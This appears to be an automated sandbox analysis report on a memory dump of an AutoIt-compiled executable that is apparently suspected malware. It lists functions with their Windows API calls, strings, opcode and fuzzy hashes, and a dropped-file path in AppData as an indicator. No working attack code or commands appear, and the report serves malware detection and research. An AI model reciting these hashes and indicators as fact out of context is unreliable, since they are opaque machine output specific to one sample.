              0x00fbe05f
              0x00fbe05f
              0x00f99677
              0x00f99677
              0x00f9967a
              0x00fbe067
              0x00fbe06b
              0x00fbe06d
              0x00fbe074
              0x00fbe074
              0x00f99680
              0x00f99680
              0x00f99683
              0x00fbe082
              0x00f99689
              0x00f99689
              0x00f9968c
              0x00fbe08c
              0x00fbe090
              0x00fbe093
              0x00fbe094
              0x00fbe09c
              0x00fbe09d
              0x00fbe0a2
              0x00f99692
              0x00f99692
              0x00f99695
              0x00fbe0aa
              0x00fbe0ae
              0x00fbe0b0
              0x00fbe0b7
              0x00fbe0b7
              0x00fbe0b0
              0x00f99695
              0x00f9968c
              0x00f99683
              0x00f9967a
              0x00000000
              0x00f99671
              0x00f99630
              0x00f99637
              0x00f9963a
              0x00f9963f
              0x00fbe00f
              0x00fbe017
              0x00fbe020
              0x00000000
              0x00fbe020
              0x00000000
              0x00f995be
              0x00f995c4
              0x00000000
              0x00f995c4
              0x00f995bc
              0x00f9958c
              0x00f9954d
              0x00f9953b
              0x00f9949d
              0x00fbd751
              0x00fbd758
              0x00000000
              0x00000000
              0x00fbd75e
              0x00f994ba
              0x00000000
              0x00000000
              0x00000000
              0x00f994ba
              0x00000000
              0x00f99480

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Message$Peek$DispatchSleepTranslate
              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
              • API String ID: 1762048999-758534266
              • Opcode ID: ee2eaa1cf88623d067cb00686e64b99c0779b404ebb41c40b4a3f49f98f7bae5
              • Instruction ID: dd284e5855f91d645ce31cb33917d6b69c704659b11be3bd034c85fcd76c47e1
              • Opcode Fuzzy Hash: ee2eaa1cf88623d067cb00686e64b99c0779b404ebb41c40b4a3f49f98f7bae5
              • Instruction Fuzzy Hash: E962F3715083429FEB24DF28C884BEAB7E4BF85314F15491DF58587245E7B8E848EB93
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9E560, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00FA14F7: _malloc.LIBCMT ref: 00FA1511
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00F9E5FF
              • __wsplitpath.LIBCMT ref: 00F9E61C
                • Part of subcall function 00FA392E: __wsplitpath_helper.LIBCMT ref: 00FA3970
              • _wcsncat.LIBCMT ref: 00F9E633
              • __wmakepath.LIBCMT ref: 00F9E64F
                • Part of subcall function 00FA39BE: __wmakepath_s.LIBCMT ref: 00FA39D4
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1546
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1560
                • Part of subcall function 00FA14F7: __CxxThrowException@8.LIBCMT ref: 00FA1571
              • _wcscpy.LIBCMT ref: 00F9E687
                • Part of subcall function 00F9E6C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,00F9E6A1), ref: 00F9E6DD
              • _wcscat.LIBCMT ref: 00FB7324
              • _wcslen.LIBCMT ref: 00FB7334
              • _wcslen.LIBCMT ref: 00FB7345
              • _wcscat.LIBCMT ref: 00FB735F
              • _wcsncpy.LIBCMT ref: 00FB739F
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
              • String ID: Include$\
              • API String ID: 3173733714-3429789819
              • Opcode ID: 45c8d57b9ea6efd875fd339452d0fa3e5721043ecde5d3eb331ce5133fc35175
              • Instruction ID: 64e86ad427f01c905ef7c40734d92b06b2f4e0d65d8e814a2757ca9e13558d40
              • Opcode Fuzzy Hash: 45c8d57b9ea6efd875fd339452d0fa3e5721043ecde5d3eb331ce5133fc35175
              • Instruction Fuzzy Hash: 175190B28043409BD720EF69DC8589BB3ECFB8D308F40492DF9C997245E7BA9644DB52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA03E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
              Download Yara Rule
              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00FA03EB
              • LoadCursorW.USER32(00000000,00007F00), ref: 00FA03FA
              • LoadIconW.USER32(?,00000063), ref: 00FA0410
              • LoadIconW.USER32(?,000000A4), ref: 00FA0423
              • LoadIconW.USER32(?,000000A2), ref: 00FA0436
              • LoadImageW.USER32 ref: 00FA045E
              • RegisterClassExW.USER32 ref: 00FA04AD
                • Part of subcall function 00FA04E0: GetSysColorBrush.USER32(0000000F), ref: 00FA0513
                • Part of subcall function 00FA04E0: RegisterClassExW.USER32 ref: 00FA053D
                • Part of subcall function 00FA04E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA054E
                • Part of subcall function 00FA04E0: InitCommonControlsEx.COMCTL32(010390E8), ref: 00FA056B
                • Part of subcall function 00FA04E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA057B
                • Part of subcall function 00FA04E0: LoadIconW.USER32(00F90000,000000A9), ref: 00FA0592
                • Part of subcall function 00FA04E0: ImageList_ReplaceIcon.COMCTL32(0128CF58,000000FF,00000000), ref: 00FA05A2
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
              • String ID: #$0$AutoIt v3
              • API String ID: 423443420-4155596026
              • Opcode ID: 46c03c3ffc953e989cac6152534b48e472737d8fa1e5389afda4d101a77f85c7
              • Instruction ID: fa645539644e26d3135c6d65847f8915e1bea2b9e59ecff27a3654ae65965988
              • Opcode Fuzzy Hash: 46c03c3ffc953e989cac6152534b48e472737d8fa1e5389afda4d101a77f85c7
              • Instruction Fuzzy Hash: E32121B1E01314AFD730DFA9E845B9ABBB9BB4C700F10415AF644A7289DBBA5500DF94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA04E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 56windowregistryCOMMON
              Download Yara Rule
              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00FA0513
              • RegisterClassExW.USER32 ref: 00FA053D
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA054E
              • InitCommonControlsEx.COMCTL32(010390E8), ref: 00FA056B
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA057B
              • LoadIconW.USER32(00F90000,000000A9), ref: 00FA0592
              • ImageList_ReplaceIcon.COMCTL32(0128CF58,000000FF,00000000), ref: 00FA05A2
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
              • String ID: +$0$TaskbarCreated
              • API String ID: 2914291525-888179712
              • Opcode ID: b27c26bc2a506d220074be9ceebf7f55a609d0912449639172848968e14abc87
              • Instruction ID: 3a1c62defc7593ef44461ef9395398ade2e5e19106d97c60b6a7e0d76cf2d5ac
              • Opcode Fuzzy Hash: b27c26bc2a506d220074be9ceebf7f55a609d0912449639172848968e14abc87
              • Instruction Fuzzy Hash: 01210BB5900318AFDB20DF94E849B9DBBB9FB0C710F10825AF984A7388D7BA5544DF94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9A9D0, Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _malloc
              • String ID: Default
              • API String ID: 1579825452-753088835
              • Opcode ID: 0997227663498519e282cf6a8f2b07acc1b6f2b22f2a2181f55d6270a53d8b35
              • Instruction ID: 655deba58119edeb97e979f7114f18640d2339729bf473426c16587c907239f5
              • Opcode Fuzzy Hash: 0997227663498519e282cf6a8f2b07acc1b6f2b22f2a2181f55d6270a53d8b35
              • Instruction Fuzzy Hash: A37281B1908301CFEB24DF25C980A6AB7E5BF85314F24885DE8868B351D779EC45EB93
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F91340, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129timewindowCOMMON
              Download Yara Rule
              APIs
              • DefWindowProcW.USER32(?,?,?,?), ref: 00F91376
              • KillTimer.USER32(?,00000001), ref: 00F913F9
                • Part of subcall function 00F91240: _memset.LIBCMT ref: 00F9126B
                • Part of subcall function 00F91240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F9129B
              • PostQuitMessage.USER32(00000000), ref: 00F9140B
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow_memset
              • String ID: TaskbarCreated
              • API String ID: 1519149367-2362178303
              • Opcode ID: 6bb119151b8c1ade011615ca44712cd3181da1551c64c5fb14ac40556842f843
              • Instruction ID: 3fa646cf644e115e61e7b420fdda70419be2be935115749a678409d89e64674b
              • Opcode Fuzzy Hash: 6bb119151b8c1ade011615ca44712cd3181da1551c64c5fb14ac40556842f843
              • Instruction Fuzzy Hash: 43412672B0420A9BFF30DFA9DC86FEE3369B754320F104626F94486585C6BA9840A792
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9FE90, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __fread_nolock_fseek_memmove
              • String ID: AU3!$EA06
              • API String ID: 3969463491-2658333250
              • Opcode ID: 414878915bc024fc8814cd9fcbb789da3b228d4b2de06168af8ac2efac67018e
              • Instruction ID: 7cc863eb30d5162c9275caad825657e2dd2fa17daf9c82d43e3d27d9ac721238
              • Opcode Fuzzy Hash: 414878915bc024fc8814cd9fcbb789da3b228d4b2de06168af8ac2efac67018e
              • Instruction Fuzzy Hash: 3B417B72A0414C5BDF11DBB8CC80FFD3B65AB0A304F6804B9F595CB242E674A989EB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F91490, Relevance: 12.1, APIs: 8, Instructions: 86windowtimeCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00F914BC
                • Part of subcall function 00F91E00: _memset.LIBCMT ref: 00F91E90
                • Part of subcall function 00F91E00: _wcsncpy.LIBCMT ref: 00F91ED2
                • Part of subcall function 00F91E00: _wcscpy.LIBCMT ref: 00F91EF1
                • Part of subcall function 00F91E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F91F03
              • KillTimer.USER32(?,?,?,?,?), ref: 00F91513
              • SetTimer.USER32 ref: 00F91522
              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00FB7BC8
              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00FB7C1C
              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00FB7C67
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
              • String ID:
              • API String ID: 1792922140-0
              • Opcode ID: 47b112bd200212be289de414c5328e74a83bc12b24c847cdd53a3e700d378621
              • Instruction ID: b586a27f1ef55924a635639f34256b3ecfd801b01c4881d2115ef6f0a0dde4ef
              • Opcode Fuzzy Hash: 47b112bd200212be289de414c5328e74a83bc12b24c847cdd53a3e700d378621
              • Instruction Fuzzy Hash: 0F31A3B0A04649BFEF36DB24C885BE6FBBCBB86304F144195E1CD96144C7785A849F91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9E700, Relevance: 10.7, APIs: 7, Instructions: 157COMMON
              Download Yara Rule
              APIs
              • GetVersionExW.KERNEL32(?), ref: 00F9E72A
                • Part of subcall function 00F92390: _wcslen.LIBCMT ref: 00F9239D
                • Part of subcall function 00F92390: _memmove.LIBCMT ref: 00F923C3
              • GetCurrentProcess.KERNEL32(?), ref: 00F9E7D4
              • GetNativeSystemInfo.KERNELBASE(?), ref: 00F9E832
              • FreeLibrary.KERNEL32(?), ref: 00F9E842
              • FreeLibrary.KERNEL32(?), ref: 00F9E854
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
              • String ID:
              • API String ID: 3363477735-0
              • Opcode ID: 82e69789acd26adaa6050cc758e63c68b4f3359232d9eedb6e21df12dc25066a
              • Instruction ID: 5bccc5c9262aba9cc1dcf57593908a2596ba16662ed2ae56397c30055c1834a7
              • Opcode Fuzzy Hash: 82e69789acd26adaa6050cc758e63c68b4f3359232d9eedb6e21df12dc25066a
              • Instruction Fuzzy Hash: 1C619C71D08786EEDB10EFA4C8846DCBFB0BF59304F14465AD444A3B01D379A998EF96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9F3B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
              Download Yara Rule
              APIs
              • SHGetMalloc.SHELL32(00F9F1FC), ref: 00F9F3BD
              • SHGetDesktopFolder.SHELL32(?,010390E8), ref: 00F9F3D2
              • _wcsncpy.LIBCMT ref: 00F9F3ED
              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00F9F427
              • _wcsncpy.LIBCMT ref: 00F9F440
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _wcsncpy$DesktopFolderFromListMallocPath
              • String ID: C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
              • API String ID: 3170942423-54651073
              • Opcode ID: 5d30906de02adbde1d3b531a4e28f6ea74373b6a8136459b143ee7abe6bf1bae
              • Instruction ID: f9c7cf4469f5afb6fbe375f7f55e76c3d1cd9dc833800693ddc8341db8a3ef72
              • Opcode Fuzzy Hash: 5d30906de02adbde1d3b531a4e28f6ea74373b6a8136459b143ee7abe6bf1bae
              • Instruction Fuzzy Hash: EB217475E00619ABDB14DBA4DC84DEFB37DEF88710F108698F905D7204EA35AE45DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9E6C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,00F9E6A1), ref: 00F9E6DD
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,00F9E6A1,00000000,?,?,?,00F9E6A1), ref: 00FB7117
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,00F9E6A1,?,00000000,?,?,?,?,00F9E6A1), ref: 00FB715E
              • RegCloseKey.ADVAPI32(?,?,?,?,00F9E6A1), ref: 00FB718F
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: QueryValue$CloseOpen
              • String ID: Include$Software\AutoIt v3\AutoIt
              • API String ID: 1586453840-614718249
              • Opcode ID: 12cf1cde51782e3eb3ae374f756c63525fb15386682facbc79dce9277d8ea104
              • Instruction ID: 312c34bb345a5f004f46eb36609cab93b54aa49a0214b3de3ff8cdceadfcb67b
              • Opcode Fuzzy Hash: 12cf1cde51782e3eb3ae374f756c63525fb15386682facbc79dce9277d8ea104
              • Instruction Fuzzy Hash: 5721D571B80204BBDB24DBA8DC46FEEB37DEF95700F200259F645E7185EA79AA009760
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA0350, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
              Download Yara Rule
              APIs
              • CreateWindowExW.USER32 ref: 00FA0385
              • CreateWindowExW.USER32 ref: 00FA03AE
              • ShowWindow.USER32(?,00000000), ref: 00FA03C4
              • ShowWindow.USER32(?,00000000), ref: 00FA03CE
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$CreateShow
              • String ID: AutoIt v3$edit
              • API String ID: 1584632944-3779509399
              • Opcode ID: e60cba21c901395d568c40ee4877598de2d1a2243c7b15b085cd06bb7e0d0603
              • Instruction ID: 44b2b6a43d363457d02c67d43d9c1f8462640cfd0ebee65ef74cccff6583315e
              • Opcode Fuzzy Hash: e60cba21c901395d568c40ee4877598de2d1a2243c7b15b085cd06bb7e0d0603
              • Instruction Fuzzy Hash: C7F0B771BD13607AF6309A64AC43F527658A718F11F71041AF784BF1C8D6EE79408BD8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC2FD3, Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
              Download Yara Rule
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,010390E8,14000000,00FBE1BD), ref: 00FC2FDD
              • LockServiceDatabase.ADVAPI32(00000000), ref: 00FC2FEA
              • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00FC2FF5
              • CloseServiceHandle.ADVAPI32(00000000), ref: 00FC2FFE
              • GetLastError.KERNEL32 ref: 00FC3009
              • CloseServiceHandle.ADVAPI32(00000000), ref: 00FC3019
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
              • String ID:
              • API String ID: 1690418490-0
              • Opcode ID: 6845d0120c8f03d7a73321b5ecbba4c7c5258a78a069360bb337dcf4fcdac4e3
              • Instruction ID: 21a7903b3e92427d6961a70dee60b62202845772a8a0a1f9f0fc708d94f4d4ca
              • Opcode Fuzzy Hash: 6845d0120c8f03d7a73321b5ecbba4c7c5258a78a069360bb337dcf4fcdac4e3
              • Instruction Fuzzy Hash: 33E09B32AC3621ABD6321A246D0DFCB375EEB1A761F244203F281D2146CB5F8505EBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA06E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 00FA06F7
              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 00FA071E
              • RegCloseKey.KERNELBASE(?), ref: 00FA0745
              • RegCloseKey.ADVAPI32(?), ref: 00FA0759
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Close$OpenQueryValue
              • String ID: Control Panel\Mouse
              • API String ID: 1607946009-824357125
              • Opcode ID: 0a8a0b1a77aa82888910e14b815b4f953a784c14a6ff82ca527b3c15a0e2a63c
              • Instruction ID: 1ab79874ef3c26123613428ac819fe2dd6be5834bb5dae57c20fb574ed9a321a
              • Opcode Fuzzy Hash: 0a8a0b1a77aa82888910e14b815b4f953a784c14a6ff82ca527b3c15a0e2a63c
              • Instruction Fuzzy Hash: 53115176A40108BF9B14CFA9E8459EFB7BDEF59310B104659F949C3200E635A911DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA49DA, Relevance: 7.7, APIs: 5, Instructions: 160COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
              • String ID:
              • API String ID: 4048096073-0
              • Opcode ID: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
              • Instruction ID: 211878367b90f30bc66e8f9c18a51ee52550216862eb960a69b8e3605887c1e9
              • Opcode Fuzzy Hash: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
              • Instruction Fuzzy Hash: 7A51B6B1E00205DBCB249FA9884479EB775AFC2370F248269E435A7191D7B4FE50FB54
              Uniqueness

              Uniqueness Score: -1.00%

